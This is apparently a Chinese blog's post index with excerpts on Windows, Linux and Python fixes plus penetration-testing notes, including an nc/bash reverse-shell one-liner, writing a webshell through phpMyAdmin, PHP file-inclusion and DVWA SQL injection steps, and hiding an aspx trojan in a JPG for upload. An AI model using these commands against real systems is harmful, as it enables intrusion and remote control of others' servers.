- 博客(32)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 windows共享文件夹开启密码后,一直登陆不成功,用户名和密码完全正确。解决方法
搞了好久了,一直提示用户名和密码不对,明明是对的,郁闷的不行行。最终解决了,方法如下:——————————————————————————————————————————windows+r,输入gpedit.msc,打开本地组策略编辑器,依次选择计算机配置-windows设置-安全设置-本地策略-安全选项“网络安全:Lan管理器身份验证级别”,选择“发送LM和NTML响应(&)”。2、选择...
2018-05-19 12:03:58
33254
7
转载 win7无法连接远程桌面--必须为远程桌面启用Windows防火墙例外
看到上面有黄色感叹号解决方法:打开“本地组策略编辑器”,按如下设置:计算机配置----->管理模板----->网络----->网络连接----->Windows防火墙----->标准配置文件----->Windows防火墙允许入站远程桌面例外(默认为未配置),选择“已启用”,并在下面的IP地址框中输入*号(可根据需要添加相应的IP)完成后发现尝试远程登录,成功转...
2018-03-16 11:37:22
42115
原创 Python删除n行后的其他行
#!/usr/bin/python#-*- coding: utf-8 -*-fin=open('add_1.txt')a=fin.readlines()# print afout=open('ok.txt','w')b=''.join(a[:3])fout.write(b)删除3行后的其他行
2017-12-12 11:03:44
1589
转载 'ascii' codec can't encode characters in position 0-3: ordinal not in range(128)
python在安装时,默认的编码是ascii,当程序中出现非ascii编码时,python的处理常常会报这样的错UnicodeDecodeError: 'ascii' codec can't decode byte 0x?? in position 1: ordinal not in range(128),python没办法处理非ascii编码的,此时需要自己设置将python的默认编码,一般设置
2017-12-01 15:05:45
4035
原创 python输出电脑上所有的串口名
输出电脑上所有的串口名:import serialimport serial.tools.list_portsfrom easygui import *port_list = list(serial.tools.list_ports.comports())if len(port_list) <= 0: print "The Serial port can't find!"
2017-12-01 14:49:28
5161
原创 使用nc反弹shell方法
hacker机:192.168.1.1目标机:192.168.1.21、在hacker机执行 nc -vlp 9999 (监听本机9999端口)2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1成功反弹回shell
2017-05-08 16:20:58
6583
原创 Linux下massan使用
例子:./masscan 178.120.0.0/13 -p3389,80,8080 --rate=10000 -oX 1.xml (扫描178.120.0.0/13这个ip段的3389、80、8080端口,速率为10kpps,以xml格式保存到1.xml)
2017-04-25 16:03:58
613
转载 python安装完毕后,提示找不到ssl模块的解决步骤
python安装完毕后,提示找不到ssl模块:解决方法:[root@localhost ~]# python2.7.5Python 2.7.5 (default, Jun 3 2013, 11:08:43) [GCC 4.1.2 20080704 (Red Hat 4.1.2-54)] on linux2Type "help", "copyright
2017-04-21 17:43:32
4898
转载 CentOS升级Python2.6到Python2.7并安装pip
CentOS6.X系统默认安装的Python都是2.6版本的平时使用以及很多的库都是要求用到2.7版本或以上,所以新系统要做的第一件事必不可少就是升级Python啦!1.需要提前安装的模块1)wgetyum install wget2)xzyum install xz3)taryum insall tar4)gcc
2017-04-11 19:44:10
268
原创 centos下nginx关闭后启动失败解决方法
情况:[root@qwer init.d]# /usr/local/nginx-1.5.1/sbin/nginx -tnginx: the configuration file /usr/local/nginx-1.5.1//conf/nginx.conf syntax is oknginx: configuration file /usr/local/nginx-1.5.1//con
2017-03-02 11:47:34
1417
原创 2017.2.24总结
==================================================================================linuxlast命令 last 单独执行last,会读取/var/log/wtmp文件内容utmp文件中保存的是当前正在本系统中的用户的信息。wtmp文件中保存的是登录过本系统的用户的信息。[still log
2017-02-28 10:33:06
276
原创 2017.2.17总结
kali linux中代理工具:mitmproxy:快捷键q - 返回上一层enter - 查看内容Tab - 切换看request/responsepageup - 上翻页pagedown - 下翻页C - 清空(注意大写)a - 放行nmap:-sL 列表扫描,不发送任何的请求,仅仅列出来-sP 发送ping请求,查看网络范围内存活的主机
2017-02-20 11:04:25
254
转载 windows powershell错误 because the execution of scripts is disabled on this system
原因:需要修改策略为unrestricted解决方法:1. 以管理员身份运行PowerShell。2. 检查当前状态:输入 Get-ExecutionPolicy ,回车。 显示: Restricted 。3. 修改状态:输入 Set-ExecutionPolicy Unrestricted 。4. 再次输入 Get-ExecutionPolicy
2017-02-16 16:49:44
1224
原创 2017.2.10总结
1、列出各文件系统的磁盘空间使用情况。$ dfFilesystem 1 K-blocks Used Available Use% Mounted on/dev/hda2 1361587 1246406 44823 97% / linux中df命令的输出清单的第1列是代表文件系统对应的设备文件的路径名(一般是硬盘上的分区);第2列给出分区包含的数据块(1024字节)的数目;第3
2017-02-13 11:48:03
232
原创 phpmyadmin拿webshell
知识点:导入导出数据:导出数据到指定路径:select 字段 from 表格 into outfile '路径' fields terminated by ','select name form user into outfile '/home/user/a.php' fields terminated by ',' (将user表中name字段的内容导入到/home/user
2017-02-13 11:46:06
1330
转载 linux内核版本对比————CentOS、RedHat
Redhat 9.0———————————————2.4.20-8RHEL 3 Update 8————————————2.4.21-47RHEL 4 ————————————————2.6.9-5RHEL 4 Update 1————————————2.6.9-11RHEL 4 Update 2————————————2.6.9-22RHEL 4 Update 3——
2017-02-08 12:19:37
2266
原创 centos安装jdk
1、java配置环境变量java -ivh jdk包java的默认路径/usr/java/配置环境变量:JAVA_HOME=/usr/java/jdk1.8.0_111PATH=$JAVA_HOME/bin:$PATHCLASSPATH=.:$JAVA_HOME/lib/dt.java:$JAVA_HOME/lib/tools.jarexport JAVA_HOME
2017-02-07 16:03:31
244
原创 2017.1.20总结
linux查看ipvi /etc/sysconfig/network-scripts/ifcfg-eth0=======================================================linux查找文件find / -name httpd.conf #在根目录下查找文件httpd.conf,表示在整个硬盘查找find /etc -n
2017-02-04 13:06:52
246
原创 2017.1.13总结
nat技术:概念:NAT(Network Address Translation,网络地址转换),这种方法需要在专用网连接到因特网的路由器上安装NAT软件。装有NAT软件的路由器叫做NAT路由器,它至少有一个有效的外部全球IP地址。这样,所有使用本地地址的主机在和外界通信时,都要在NAT路由器上将其本地地址转换成全球IP地址,才能和因特网连接。NAT将自动修改IP报文的源IP地址和目的IP地址
2017-01-16 10:38:34
304
原创 2016.12.30总结
在sql server中,SELECT @@VERSION可显示sql server版本信息——————————————————————————————————————————group by用法表userid name1 a1 b1 cselect id,count(name) from user group by id(其中conut是聚合函
2017-01-06 15:07:24
346
转载 ubuntu: apt-get update的时候遇到“Hash Sum mismatch”错误
在运行sudo apt-get update的时候遇到以下错误:[plain] view plain copyW: Failed to fetch bzip2:/var/lib/apt/lists/partial/mirrors.163.com_ubuntu_dists_quantal-updates_main_binary-i386_Pac
2016-12-02 10:46:46
303
原创 No package python-pip available. 解决方法
在CentOS下需要用到pip,安装pip包,输入yum install python-pip,提示No package python-pip available.Error: Nothing to do因为没有此rpm包,此包包含在epel源里面输入rpm -ivh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-
2016-11-28 16:24:34
18580
1
原创 2016.11.25总结
linux命令解压 tar zxvf aaa.tar.gz x(extract提取) : 从 tar 包中把文件提取出来z : 表示 tar 包是被 gzip 压缩过的,所以解压时需要用 gunzip 解压v : 显示详细信息f :指定被处理的文件是 xxx.tar.gzw 可查询登录当前系统的用户信息,以及这些用户目前正在做什么操作id
2016-11-28 11:31:48
274
转载 PHP文件包含与命令执行方式总结
转自:http://www.myhack58.com/Article/html/3/7/2012/36277.htm1、文件包含利用通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.Type of call:require($file);Exploit:http://host/?fi
2016-11-25 18:10:24
2760
原创 2016.11.18总结
http/1.1 PUT: 从客户端向服务器传送的数据取代指定的文档的内容。(简单地说:通常用于向服务器发送请求,如果URI不存在,则要求服务器根据请求创建资源,如果存在,服务器就接受请求内容,并修改URI资源的原始版本。)MOVE: 请求服务器将指定的页面移至另一个网络地址。CVE 的英文全称是"Common Vulnerabilities & Exposures"公共漏洞和暴露
2016-11-21 10:47:49
259
转载 burosuite中Intruder使用
burosuite中Intruder使用:Positions:1、Sniper 狙击的意思 就是一个一个打 参数可以定义任意个 但是payload只能选一个类似于: 2个变量1-3个数字 会攻击15次。| 1 1 | 2 1 | 3 1 || 1 2 | 2 2 | 3 2 || 1 3 | 2 3 | 3 3 |——————————————————————————
2016-11-07 13:44:00
691
原创 DVWA (Dam Vulnerable Web Application)中级SQL注入实战
1、输入’ or 1=1 # ,发现’被转义成\’ ‘ “ \ 都被转义加\2、输入1 or 1=1 # ,发现有数字型注入 3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询 4、输入1 union select user(),datab
2016-11-07 10:07:37
4707
原创 2016.11.04总结
[root@localhost ~]#分别代表用户名(root),主机名(localhost),当前路径(~,当前用户的home目录),权限标志位(#代表root,$代表普通用户)mysql 总结select user() 查看当前用户select database() 查询当前的数据库mysql注释(三种):# 以“
2016-11-07 10:05:23
361
原创 IE被篡改为2345主页
问题描述:回到家发现家里电脑IE被篡改为2345主页,简直可恶根据网上的建议,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,查看右边的Start Page发现果然是被修改为2345了删掉内容,刷新还在;将start page删除,刷新还在;将start page改为任意名11,刷新发现又出
2016-10-18 16:00:47
1557
原创 电脑被dns劫持
背景:家里用的是电信送的网关,换了路由器,还是被劫持。。。搞不懂是运营商劫持还是被安装插件劫持具体事件:日常用360浏览器,发现直接在https://hao.360.cn/主页进入购物网站京东、天猫均有小尾巴,以为浏览器被劫持了,下载了火狐,发现也被劫持了。连上wifi,再上手机看看,结果发现手机也被劫持了。更讨厌的是,手机不连wifi,用数据链接,上购物网站,竟然也被劫持了。。。我和
2016-10-10 15:14:25
934
原创 渗透记录——iis7.5漏洞没有iis6的解析漏洞
拿到一个后台,刚开始不让传马,apsx伪装成jpg,提示安全错误,含有html编码,看来必须要用正常图片。于是找了小图片,用copy /b d:\aa.jpg+d:\xiaoma.aspx luo2.jpg ,如图合成了一个含马的正常图片(注意顺序:图片+马是修改文件头,马+图片是修改图片尾)直接修改了文件头,发现可以上传。开心呀,于是就花式作死,各种尝试改后缀……
2016-09-18 17:38:07
15730
1
原创 python中 __name__=="__main__"
最近接触python,为了加强记忆,记录一下学习中的问题如果有错,希望大家多多指导。_name_="_main_" 用在主程序中举例:a.pyif _name_="_main_":passpass当在b.py中调用a.py,不会执行_name_="_main_"中的语句,只执行其他语句。但运行a.py就会执行_name_="_main_"中的语句。
2016-08-26 13:38:51
511
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人